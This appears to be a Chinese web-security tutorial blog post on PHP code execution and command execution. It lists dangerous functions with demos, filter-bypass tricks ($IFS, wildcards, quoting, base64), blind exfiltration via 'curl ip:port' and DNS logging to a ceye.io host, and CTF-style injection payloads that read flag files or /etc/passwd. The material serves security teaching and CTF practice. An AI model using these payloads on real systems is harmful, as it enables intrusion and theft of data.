0x01 代码执行

1.1 概念

远程代码执行实际上是调用服务器网站代码进行执行。

1.2 常见执行方法

eval

eval():将字符串当做函数进行执行(需要传入一个完整的语句)

demo:

<?php
eval('echo "hello";');
?>

assert

assert():判断是否为字符串,是则当成代码执行

demo:

低版本:

<?php assert($_POST['a']);?>

php官方在php7中更改了assert函数。在php7.0.29之后的版本不支持动态调用。

7.0之后的demo:

<?php
$a = 'assert';
$a(phpinfo());
?>

call_user_func

call_user_func():回调函数,可以使用is_callable查看是否可以进行调用

demo:

<?php
highlight_file(__FILE__);
$a = 'system';
$b = 'pwd';
call_user_func($a,$b);
call_user_func('eval','phpinfo()');
?>

其中基本可以传递任何内置的和用户自定义的函数, 除了语言结构:array、echo、empty、eval...

call_user_fuc_array

call_user_fuc_array():回调函数,参数为数组

demo:

<?php
highlight_file(__FILE__);
$array[0] = $_POST['a'];
call_user_func_array("assert",$array);
?>

create_function

create_function():创建匿名函数

string create_function(string $args,string $code)

args是要创建的函数的参数,code是函数内的代码

demo:

<?php
highlight_file(__FILE__);
$a = create_function('$code', 'echo $code');
$b = 'hello';
$a($b); $a = 'phpinfo();';
$b = create_function(" ", $a);
$b();
?>

preg_replace

preg_replace():当为/e时代码会执行,前提是不超过php7

demo:

<?php
highlight_file(__FILE__);
$a = 'phpinfo()';
$b = preg_replace("/abc/e", $a, 'abc');
?>

array_map

array_map():为数组的每个元素应用回调函数

demo:

<?php
highlight_file(__FILE__);
$a = $_GET['a'];
$b = $_GET['b'];
$array[0] = $b;
$c = array_map($a,$array);
?>

array_filter

array_filter():依次将 array 数组中的每个值传递到 callback 函数。如果 callback 函数返回 true,则 array 数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。

demo:

<?php
highlight_file(__FILE__);
$array[0] = $_GET['a'];
array_filter($array,'assert');
?>

usort

usort():使用自定义函数对数组进行排序

$GET在php5.6中引入了新特性。即可以将数组展开成参数的形式

demo:

<?php
highlight_file(__FILE__);
usort($_GET[1],'assert');
?>

用法:

1[]=phpinfo()&1[]=123&2[]=assert

大致过程就是,GET变量被展开成两个参数['phpinfo', '123']和assert,传入usort函数。

usort函数的第二个参数是一个回调函数assert,其调用了第一个参数中的phpinfo();

uasort

uasort():使用用户自定义的比较函数对数组的值进行排序并保持索引关联

demo:

<?php
highlight_file(__FILE__);
$e = 'assert';
$arr = array($_REQUEST['pass'],'test' );
uasort($arr, $e);
?>

${}

${}:中间的php代码将会被解析

demo:

<?php
highlight_file(__FILE__);
${phpinfo()};
?>

1.3 代码执行例题

题目:

<?php
highlight_file(__FILE__);
$price = $_GET['price'];
$code = 'echo $name.'.'的价格是'.$price.';';
$b = create_function('$name', $code);
$b('iphone');
?>

代码逻辑很清楚,调用b这个匿名函数,参数为iphone。

在整个过程中,从表面上看,我们能够控制的只有price的值,但是我们把这个函数b拆开来看就变成了下面这样:

function b($name){
echo $name.的价格是.$price;
}

再仔细看一下这个price,我们是不是可以在函数内部改造一下?

构造payload:

?price=123;}phpinfo();/*

那么传入后代码就会变成下面这样:

function b($name){
echo $name.的价格是.123;}phpinfo();/*;
}

0x02 命令执行

2.1 命令执行概念

通过易受攻击的应用在主机上执行任意命令。

2.2 命令执行常见函数

system

system:可以执行系统命令并将其输出

demo:

<?php
highlight_file(__FILE__);
system('pwd');
system('whoami');
?>

exec

exec:执行命令,但无输出,可以使用output进行输出

demo:

<?php
highlight_file(__FILE__);
exec('pwd',$b);
var_dump($b);
?>

passthru

passthru:执行命令并输出

demo:

<?php
highlight_file(__FILE__);
passthru('ls');
?>

shell_exec

shell_exec:执行命令,但无回显

demo:

<?php
highlight_file(__FILE__);
var_dump(shell_exec('ls'));
?>

反引号

反引号:执行shell命令,并返回输出的字符串

demo:

<?php
highlight_file(__FILE__);
$a = 'pwd';
echo `$a`;
?>

ob_start

ob_start:打开输出控制缓冲

demo:

<?php
highlight_file(__FILE__);
ob_start("system");
echo "whoami";
ob_end_flush();
?>

0x03 绕过

3.1 常见分隔符

- 换行符 %0a
- 回车符 %0d
- 连续指令 ;
- 后台进程 &
- 管道符 |
- 逻辑 || &&

3.2 绕过空格

- $IFS
- <
- ${IFS}
- $IFS$9
- %09

3.3 各类符号

即使用substr string pos len的方法进行取字符

demo:

echo "${PATH:0:1}"
echo "`expr$IFS\substr\$IFS\$(pwd)\$IFS\1\$IFS\1`"
echo `$(expr${IFS}substr${IFS}$PWD${IFS}1${IFS}1)`
expr${IFS}substr${IFS}$SESSION_MANAGER${IFS}6${IFS}1
- %0a
- %0d
- %00
- %20

3.4 敏感字符绕过

3.4.1 变量绕过

a=l,b=s;$a$b

3.4.2 base64编码绕过

echo 'cat' | base64

3.4.3 未定义的初始化变量

cat$b /etc/passwd

3.4.4 连接符

cat /etc/pass’w’d

3.4.5 使用通配符

/???/?s --help

3.5 无回显

1.使用延时函数,比如:ls|sleep 3

2.使用http,比如:ls|curl ip:port

3.使用dns

3.6 命令执行例题

<?php
highlight_file(__FILE__);
include("where_flag.php");
echo "ping";
$ip = (string)$_GET['ping'];
$ip = str_replace(">", "0.0", $ip);
shell_exec("ping".$ip);
?>

思路1:使用cp命令将where_flag.php改名,然后下载得到flag

如:

127.0.0.1;cp where_is_flag.php 1.txt

思路二:dnslog外带

因为dnslog不能带有空格,所以使用sed去空格

最后的payload:

/?ping=cat where_flag.php|sed s/[[:space:]]//.php.xxxx.ceye.io

因为ceye无法处理换行,所以我们可以使用下面的方法处理换行问题

ping=127.0.0.1 -c 1;for i in `cat where_is_flag.php`;do ping $i.xxx.ceye.io;done;

注意:只能在curl下有效

3.6 长度绕过

如15位命令执行、7位命令执行、5位命令执行、4位命令执行

具体参考:

https://xz.aliyun.com/t/1579

3.7 无字母数字命令执行(webshell)

1、异或

因为每个字符的本质是ascii码值,而ascii可以变成二进制,二进制进行xor后再转换,就是字母

2、取反

其实同理,将字符转换为二进制后取反

3、自增

具体可查看:

https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html

https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html

https://www.php.net/manual/zh/language.operators.increment.php

0x04 参考链接

聊一聊代码、命令执行

[WEB安全]代码/命令执行总结的更多相关文章

  1. Weblogic CVE-2018-3191远程代码命令执行漏洞复现

      0x00 简介 北京时间10月17日,Oracle官方发布的10月关键补充更新CPU(重要补丁更新)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191).该漏洞允许未经 ...

  2. 【技巧总结】Penetration Test Engineer[3]-Web-Security(SQL注入、XXS、代码注入、命令执行、变量覆盖、XSS)

    3.Web安全基础 3.1.HTTP协议 1)TCP/IP协议-HTTP 应用层:HTTP.FTP.TELNET.DNS.POP3 传输层:TCP.UDP 网络层:IP.ICMP.ARP 2)常用方法 ...

  3. 风炫安全web安全学习第三十一节课 命令执行以及代码执行演示

    风炫安全web安全学习第三十一节课 命令执行以及代码执行演示 参考: http://blog.evalshell.com/2020/12/20/风炫安全web安全学习第三十一节课-命令执行以及代/

  4. 风炫安全web安全学习第三十节课 命令执行&代码执行基础

    风炫安全web安全学习第三十节课 命令执行&代码执行基础 代码执行&命令执行 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统. 远程系统命令执行 ...

  5. php课程 1-3 web项目中php、html、js代码的执行顺序是怎样的(详解)

    php课程 1-3 web项目中php.html.js代码的执行顺序是怎样的(详解) 一.总结 一句话总结:b/s结构 总是先执行服务器端的先.js是客户端脚本 ,是最后执行的.所以肯定是php先执行 ...

  6. web漏洞-命令执行、文件上传、XSS

    一.命令执行   1:什么是命令执行? 命令执行漏洞是指攻击者可以随意执行系统命令.属于高危漏洞之一任何脚本语言都可以调用操作系统命令. 应用有时需要调用一些执行系统命令的函数,举个例子如:PHP中的 ...

  7. [web安全原理]PHP命令执行漏洞基础

    前言 PHP命令执行漏洞 应用程序的某些功能功能需要调用可以执行系统命令的函数,如果这些函数或者函数的参数被用户控制,就有可能通过命令连接符将恶意命令拼接到正常的函数中,从而随意执行系统命令,这就是命 ...

  8. Android 在Android代码中执行命令行

    1.路径最好不要是自己拼写的路径/mnt/shell/emulated/0/wifidog.conf 最好是通过方法获取的路径,不然可能导致命令无效  (挂载点的原因) public static f ...

  9. 【MongoDB】6.关于MongoDB存储文件的 命令执行+代码执行

    参考:http://www.runoob.com/mongodb/mongodb-gridfs.html 1.命令执行 MongoDB GridFS GridFS 用于存储和恢复那些超过16M(BSO ...

随机推荐

  1. iOS - Scenekit3D引擎初探之 - 给材质贴图

    今天简单说一下 SceneKit 给材质贴图. 1,最简单的一种方法,直接打开dae 或者 scn 文件直接设置  如上图,这个dae 文件中只有一个几何体,几何体中只有一个材质球,然后设置材质球的d ...

  2. H5新增input标签

    1.电子邮件 <input type="email" name="email"/> 默认正则:输入内容必须有@符号,@后面必须有内容 2.搜索框 & ...

  3. 学习到目前,自己封装的db类和pdo类

    DB封装类 <?php class DBDA { public $host = "localhost"; public $uid = "root"; pu ...

  4. Dumpsys Alarm查看应用程序唤醒命令

    Dumpsys alarm查看应用程序唤醒命令: 在安卓adb root进如命令行后(没有root或者root群组的权限执行不了该命令), 1. <span style="font-s ...

  5. 华为SDN:解决传统网络3大问题

    转:http://mp.ofweek.com/tele/a145613326756 科技潮人 2013-08-05 14:20 传统网络之困 互联网爆炸式增长,除了规模和发展速度远超之前所有曾出现的数 ...

  6. Nginx虚拟主机配置--配置Nginx的主配置文件

    单台Nginx WEB服务器同时会配置N个网站,也可称之为配置N个虚拟域名的主机,即多个域名对应同一个80端 口. 每个虚拟主机可以是一个独立网站.可以具有独立域名,同一台物理机上面的虚拟主机相互之间 ...

  7. 【转】java注解处理器——在编译期修改语法树

    https://blog.csdn.net/a_zhenzhen/article/details/86065063 前言从需求说起由于相关政策,最近公司安全部要求各系统在rpc接口调用的交互过程中把相 ...

  8. Win8.1 Anaconda下安装第三方库,以jieba wordcloud为例

    最近在看情感分析的东西,于是在spyder里import jieba,and then就报错了. 百度之后,发现jieba是一个第三方库,它并不存在于anaconda内置的packages中.所以在用 ...

  9. [MVC] 自定义ActionSelector,根据参数选择Action[转载]

    很多时候我们会根据UI传入的参数,呈现不同的View.也就是对于同一个Action如何根据请求数据返回不同的View.通常情况下我们会按照如下方法来写,例如: [AcceptVerbs(HttpVer ...

  10. 【转载】浅谈HTTPS以及Fiddler抓取HTTPS协议

    最近想尝试基于Fiddler的录制功能做一些接口的获取和处理工作,碰到的一个问题就是简单连接Fiddler只能抓取HTTP协议,关键的登录请求等HTTPS协议都没有捕捉到,所以想让Fiddler能够同 ...